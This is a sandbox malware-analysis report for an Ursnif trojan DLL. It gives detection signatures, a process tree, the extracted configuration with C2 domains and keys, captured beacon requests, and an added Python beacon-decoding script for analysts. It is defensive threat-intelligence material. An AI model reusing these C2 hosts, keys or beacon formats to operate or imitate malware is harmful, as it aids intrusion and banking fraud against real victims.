
Windows Analysis Report 2e.dll

Overview

General Information

Sample Name: 2e.dll
Analysis ID: 498882
MD5: 92a0f1023e064a46fbf2e6bb697edf55
SHA1: d2d28a35de82e8161266355a351a1e5822d49303
SHA256: 2e012edb93bb99de397b629cdc44d7516f9e6f47cd7106c93d2d6fd66a37af87
Tags: dll
Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Multi AV Scanner detection for domain / URL
Yara detected Ursnif
Writes or reads registry keys via WMI
Writes registry values via WMI
Uses 32bit PE files
Antivirus or Machine Learning detection for unpacked file
Tries to load missing DLLs
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Queries the installation date of Windows
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
PE / OLE file has an invalid certificate
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 796 cmdline: loaddll32.exe 'C:\Users\user\Desktop\2e.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 5236 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 4872 cmdline: rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • iexplore.exe (PID: 6632 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5044 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6632 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 3684 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5716 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3684 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{
  "lang_id": "RU, CN",
  "RSA Public Key": "aHj/FBAOlIGEKeY7hJtySGbhiJ+OuJag0uZwD+z98lrXzI6cghioivt/zNqE6myavQkK1TvPguLqYjDl5wY423TG5cujR5I12+riFLmXU6yLpvCwEpgEflmuQBdLI5UmZ7PM966PLmgcotslJ9y1/jYsiD2WoJkIZSAKBnncJmMF7h9eqsKMXazDFT0yQ2hN",
  "c2_domain": ["api10.laptok.at/api1", "golang.feel500.at/api1", "go.in100k.at/api1"],
  "botnet": "1100",
  "server": "730",
  "serpent_key": "R13xH4JuHdOWL6Sg",
  "sleep_time": "10",
  "CONF_TIMEOUT": "20",
  "SetWaitableTimer_value": "0",
  "dga_base_url": "constitution.org/usdeclar.txt",
  "dga_tld": "com ru org",
  "DGA_count": "10"
}

Of the three c2_domain entries only api10.laptok.at was resolved and contacted during this run (see the DNS and HTTP lines in the Networking section); golang.feel500.at, go.in100k.at and the DGA fallback (seed text constitution.org/usdeclar.txt, TLDs com/ru/org, 10 domains) were not exercised, so they are configuration-derived indicators rather than observed ones.

Yara Overview

Memory Dumps

Source                                                                Rule                  Description           Author
00000000.00000003.803227069.0000000003A48000.00000004.00000040.sdmp   JoeSecurity_Ursnif    Yara detected Ursnif  Joe Security
00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp  JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security
00000002.00000002.901240382.0000000002F90000.00000040.00000001.sdmp   JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security
00000002.00000003.899624754.0000000005768000.00000004.00000040.sdmp   JoeSecurity_Ursnif    Yara detected Ursnif  Joe Security
00000000.00000002.1203393631.0000000003149000.00000004.00000040.sdmp  JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security
(23 further entries are not included in this export; the Strings column is empty for all rows)

            Unpacked PEs

Source                                    Rule                  Description           Author
0.2.loaddll32.exe.e00000.1.raw.unpack     JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security
2.2.rundll32.exe.30e0000.2.unpack         JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security
0.2.loaddll32.exe.e00000.1.unpack         JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security
2.2.rundll32.exe.2f90000.1.unpack         JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security
2.2.rundll32.exe.10000000.3.raw.unpack    JoeSecurity_Ursnif_1  Yara detected Ursnif  Joe Security
(13 further entries are not included in this export; the Strings column is empty for all rows)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: 2e.dll | Avira: detected
Found malware configuration
Source: 00000002.00000002.901240382.0000000002F90000.00000040.00000001.sdmp | Malware Configuration Extractor: Ursnif (the configuration is reproduced in full under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: 2e.dll | Virustotal: Detection: 65%
Source: 2e.dll | Metadefender: Detection: 40%
Source: 2e.dll | ReversingLabs: Detection: 82%
Multi AV Scanner detection for domain / URL
Source: api10.laptok.at | Virustotal: Detection: 14%
Antivirus or Machine Learning detection for unpacked file
Source: 2.2.rundll32.exe.30e0000.2.unpack | Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.2.loaddll32.exe.e00000.1.unpack | Avira: Label: TR/Crypt.XPACK.Gen8
Source: 2.2.rundll32.exe.10000000.3.unpack | Avira: Label: TR/Crypt.XPACK.Gen8
Source: 0.2.loaddll32.exe.10000000.4.unpack | Avira: Label: TR/Crypt.XPACK.Gen8

Source: 2e.dll | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
Source: C:\Windows\System32\loaddll32.exe | Code function: 0_2_00FA7DD8 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49792 -> 87.106.18.141:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49792 -> 87.106.18.141:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49824 -> 87.106.18.141:80
Internet Provider seen in connection with other malware
Source: Joe Sandbox View | ASN Name: ONEANDONE-ASBrauerstrasse48DE
IP address seen in connection with other malware
Source: Joe Sandbox View | IP Address: 87.106.18.141

Source: msapplication.xml0.15.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.15.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x97bbf46c,0x01d7bb86</date><accdate>0x97bbf46c,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.15.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.15.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.15.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.15.dr | String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x97c31b95,0x01d7bb86</date><accdate>0x97c31b95,0x01d7bb86</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: loaddll32.exe, 00000000.00000002.1203164560.0000000001760000.00000002.00020000.sdmp | String found in binary or memory: http://api10.laptok.at/api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1P
Source: {DD28BAED-2779-11EC-90EB-ECF4BBEA1588}.dat.21.dr, ~DFB9EDA9C4DE41A518.TMP.21.dr | String found in binary or memory: http://api10.laptok.at/api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1PHO/5a
Source: {C2243AEB-2779-11EC-90EB-ECF4BBEA1588}.dat.15.dr | String found in binary or memory: http://api10.laptok.at/api1/DGBXE3uXrLTWiBjVyk/VC7Ta4hFF/xsAyuQ20ayjuhLgkiSkm/m3K_2FmdKtkRCW_2B7u/tX
Source: 2e.dll | String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 2e.dll | String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 2e.dll | String found in binary or memory: http://ocsp.sectigo.com0
Source: msapplication.xml.15.dr | String found in binary or memory: http://www.amazon.com/
Source: msapplication.xml1.15.dr | String found in binary or memory: http://www.google.com/
Source: msapplication.xml2.15.dr | String found in binary or memory: http://www.live.com/
Source: msapplication.xml3.15.dr | String found in binary or memory: http://www.nytimes.com/
Source: msapplication.xml4.15.dr | String found in binary or memory: http://www.reddit.com/
Source: msapplication.xml5.15.dr | String found in binary or memory: http://www.twitter.com/
Source: msapplication.xml6.15.dr | String found in binary or memory: http://www.wikipedia.com/
Source: msapplication.xml7.15.dr | String found in binary or memory: http://www.youtube.com/
Source: 2e.dll | String found in binary or memory: https://sectigo.com/CPS0D
Source: unknown | DNS traffic detected: queries for: api10.laptok.at
Source: global traffic | HTTP traffic detected:
  GET /api1/DGBXE3uXrLTWiBjVyk/VC7Ta4hFF/xsAyuQ20ayjuhLgkiSkm/m3K_2FmdKtkRCW_2B7u/tXHmCyMHbP9slqB1L8zpaC/nfhvJ6s58irru/pNJBMQ_2/B9Q8wSf7euVWpy0kLFFtWzz/vAwDCO_2Fo/3v4FyeGSRuSjMupWH/_2BEQ6znA7PT/8caxgyO1tr2/cTDPOBy_2FHAvv/tgKZ2JSY8uZo5PCTnq6VX/_2F2Vff20_2Fr9ux/TFmLX_2BIHd1Zmp/Jqw_2BLpi2pH8Zi61P/xEqI3ryES/n6BjkuL3N3RbBmMCK9xy/loeot0z7U9fUAU78A6C/ywgL0kQB0_2BMve6S_2Flf/2SujN_2Fl/B HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: api10.laptok.at
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /favicon.ico HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Host: api10.laptok.at
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1PHO/5acsxz5qxHDpv8YBmMuvj7/KGpLxQcloIDfE/SXYboMNK/ZGVNwVWGfnWgXZ7LibENrAZ/rGu1uarUfj/FSkhkIGZ0I6ED2ThT/iotSrHt6InUD/umvaUlfqIMb/01G4_2FdSHt_2F/JPI5oPhpcVsnT5eUGv8s0/LSKuaJdd_2FAe_2F/vQT2v29m9TEniEM/b63Yg6FSycj4oUXo8F/FUMOEIDKM/JTkYuf9RIKrVWGrferoc/GwDXbtZ7LjM2klfVose/Bk9CRR6n/Lu2z5l HTTP/1.1
  Accept: text/html, application/xhtml+xml, image/jxr, */*
  Accept-Language: en-US
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Accept-Encoding: gzip, deflate
  Host: api10.laptok.at
  Connection: Keep-Alive
Source: global traffic | HTTP traffic detected:
  GET /favicon.ico HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
  Host: api10.laptok.at
  Connection: Keep-Alive
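The two C2 requests above are what Snort rules 2033203 and 2033204 ("URI Struct M1 (_2B)" / "M2 (_2F)") key on. The Python below is an added example, not code from this report, from Joe Sandbox or from the malware, showing how an analyst can turn such request lines back into the base64 text the bot sent. It rests on assumptions the page does not state: that the path is base64 in which "+" and "/" were rewritten as _2B and _2F, that the remaining "/" characters are filler inserted after encoding to fake a directory tree, and that "/api1/" is the C2 path prefix taken from the c2_domain entries in the extracted configuration. The sample input is the request lines from this report plus one constructed benign request.

```python
"""Triage of Ursnif/ISFB-style beacon URIs.

Added example, not code from the Joe Sandbox report. Assumptions (not stated
on the page): beacon paths are base64 text with '+' and '/' written as _2B and
_2F, filler '/' inserted at arbitrary positions, and "/api1/" as the C2 path
prefix (from the c2_domain entries of the extracted configuration).
"""
import base64
import binascii
import re
from typing import Dict, List, Optional, Tuple

_TOKENS = {"F": "/", "B": "+"}          # assumed URL-safe substitution
_TOKEN_RE = re.compile(r"_2([FB])")
_B64 = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/")

# Constructed sample input: (host, request line). The first three are the
# requests from this report; the last is a benign request that contains a
# _2F token and must not be flagged.
SAMPLE_REQUESTS: List[Tuple[str, str]] = [
    ("api10.laptok.at", "GET /api1/DGBXE3uXrLTWiBjVyk/VC7Ta4hFF/xsAyuQ20ayjuhLgkiSkm/m3K_2FmdKtkRCW_2B7u/tXHmCyMHbP9slqB1L8zpaC/nfhvJ6s58irru/pNJBMQ_2/B9Q8wSf7euVWpy0kLFFtWzz/vAwDCO_2Fo/3v4FyeGSRuSjMupWH/_2BEQ6znA7PT/8caxgyO1tr2/cTDPOBy_2FHAvv/tgKZ2JSY8uZo5PCTnq6VX/_2F2Vff20_2Fr9ux/TFmLX_2BIHd1Zmp/Jqw_2BLpi2pH8Zi61P/xEqI3ryES/n6BjkuL3N3RbBmMCK9xy/loeot0z7U9fUAU78A6C/ywgL0kQB0_2BMve6S_2Flf/2SujN_2Fl/B HTTP/1.1"),
    ("api10.laptok.at", "GET /favicon.ico HTTP/1.1"),
    ("api10.laptok.at", "GET /api1/9cxo6IB1Y7pDV3pIFs/pxY2OU074/uQoS3fQTrkAvwEYVEAv9/V9besIl3CRfg1NE1PHO/5acsxz5qxHDpv8YBmMuvj7/KGpLxQcloIDfE/SXYboMNK/ZGVNwVWGfnWgXZ7LibENrAZ/rGu1uarUfj/FSkhkIGZ0I6ED2ThT/iotSrHt6InUD/umvaUlfqIMb/01G4_2FdSHt_2F/JPI5oPhpcVsnT5eUGv8s0/LSKuaJdd_2FAe_2F/vQT2v29m9TEniEM/b63Yg6FSycj4oUXo8F/FUMOEIDKM/JTkYuf9RIKrVWGrferoc/GwDXbtZ7LjM2klfVose/Bk9CRR6n/Lu2z5l HTTP/1.1"),
    ("www.example.com", "GET /static/app_2F.js HTTP/1.1"),
]


def request_path(line: str) -> str:
    """Return the request-target of an HTTP request line, or '' if malformed."""
    parts = line.split()
    if len(parts) < 3 or parts[0] not in ("GET", "POST"):
        return ""
    return parts[1]


def reassemble_blob(path: str, c2_prefix: str = "/api1/") -> Optional[str]:
    """Undo the URI encoding; return base64 text, or None if the path is not one.

    Filler slashes are removed *before* the token substitution: a slash can be
    inserted inside a token (".../pNJBMQ_2/B9Q8..." in the first beacon), so a
    per-segment substitution would leave a dangling "_2" and corrupt the blob.
    """
    if not path.startswith(c2_prefix):
        return None
    raw = path[len(c2_prefix):].replace("/", "")
    blob = _TOKEN_RE.sub(lambda m: _TOKENS[m.group(1)], raw)
    # '_' is not in the base64 alphabet, so any leftover '_' (or other stray
    # character) means this was not an encoded beacon.
    if not blob or not set(blob) <= _B64:
        return None
    return blob


def is_beacon(path: str, c2_prefix: str = "/api1/", min_segments: int = 4) -> bool:
    """Heuristic counterpart of the ET 'URI Struct' rules plus a structural check."""
    if not _TOKEN_RE.search(path):
        return False
    segments = [s for s in path.split("/") if s]
    if len(segments) < min_segments:
        return False
    return reassemble_blob(path, c2_prefix) is not None


def decode_blob(blob: str) -> Optional[bytes]:
    """Base64-decode the reassembled text, restoring stripped '=' padding.

    The output is still ciphertext (the extracted config carries the Serpent
    key under "serpent_key"); decryption is not attempted here.
    """
    pad = (-len(blob)) % 4
    if pad == 3:                        # length % 4 == 1 is never valid base64
        return None
    try:
        return base64.b64decode(blob + "=" * pad, validate=True)
    except (binascii.Error, ValueError):
        return None


def triage(host: str, line: str, c2_prefix: str = "/api1/") -> Dict[str, object]:
    """Classify one request line and, for beacons, recover the ciphertext size."""
    path = request_path(line)
    beacon = is_beacon(path, c2_prefix)
    blob = reassemble_blob(path, c2_prefix) if beacon else None
    ct = decode_blob(blob) if blob else None
    return {
        "host": host,
        "path": path,
        "beacon": beacon,
        "blob": blob,
        "ciphertext_len": len(ct) if ct is not None else None,
    }


if __name__ == "__main__":
    for host, line in SAMPLE_REQUESTS:
        r = triage(host, line)
        flag = "BEACON" if r["beacon"] else "ok    "
        print(f"{flag} {host}{str(r['path'])[:40]}... ciphertext_len={r['ciphertext_len']}")
```

The slash-before-token order is the point worth remembering: the first beacon contains ".../pNJBMQ_2/B9Q8...", where a filler slash splits a _2B token, so substituting per path segment would silently mangle the result. The prefix and host should come from the extracted configuration (c2_domain) rather than being hard-coded as here, and what comes out is Serpent ciphertext, not plaintext.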

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match | File source: 00000000.00000003.803227069.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.899624754.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.899679328.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.803315900.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.899458212.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.899498607.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.899414511.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.901603317.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1203601349.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.803348643.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.803173940.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.803390693.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.899563679.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.803371540.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.899592894.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.803277362.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.803130026.0000000003A48000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.899658912.0000000005768000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: loaddll32.exe PID: 796, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 4872, type: MEMORYSTR
Source: Yara match | File source: 0.2.loaddll32.exe.e00000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.rundll32.exe.30e0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.e00000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.rundll32.exe.2f90000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.rundll32.exe.10000000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.rundll32.exe.2f40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.4ce94a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.31494a0.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.rundll32.exe.30e0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.rundll32.exe.2f90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.d60000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.10000000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.fa0000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.10000000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.31494a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.3.rundll32.exe.4ce94a0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.loaddll32.exe.d60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.1203692566.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.901240382.0000000002F90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1203393631.0000000003149000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.901405735.00000000030E0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.901669349.0000000010000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1202749084.0000000000D60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000003.900182748.0000000004CE9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1202777990.0000000000E00000.00000040.00000001.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match | the same 46 memory-dump, process-memory and unpacked-PE matches listed under "Key, Mouse, Clipboard, Microphone and Screen Capturing" above (the report repeats the identical list for this category)

                      System Summary:

                      barindex
                      Writes or reads registry keys via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Writes registry values via WMIShow sources
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                      Source: C:\Windows\SysWOW64\rundll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                      Source: 2e.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
                      Source: C:\Windows\System32\loaddll32.exeSection loaded: mspdb140.dllJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100021A40_2_100021A4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00FA40B30_2_00FA40B3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00FAAF440_2_00FAAF44
                      Source: 2e.dllStatic PE information: invalid certificate
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001C22 GetProcAddress,NtCreateSection,memset,0_2_10001C22
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001AD1 NtMapViewOfSection,0_2_10001AD1
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_10001252 GetLastError,NtClose,0_2_10001252
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_100023C5 NtQueryVirtualMemory,0_2_100023C5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00FA7925 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_00FA7925
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00FAB169 NtQueryVirtualMemory,0_2_00FAB169
                      Source: 2e.dllVirustotal: Detection: 65%
                      Source: 2e.dllMetadefender: Detection: 40%
                      Source: 2e.dllReversingLabs: Detection: 82%
                      Source: 2e.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00FA229C CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00FA229C
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1
Source: unknown | Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\2e.dll'
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6632 CREDAT:17410 /prefetch:2
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3684 CREDAT:17410 /prefetch:2
Source: C:\Windows\System32\loaddll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2e.dll',#1
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6632 CREDAT:17410 /prefetch:2
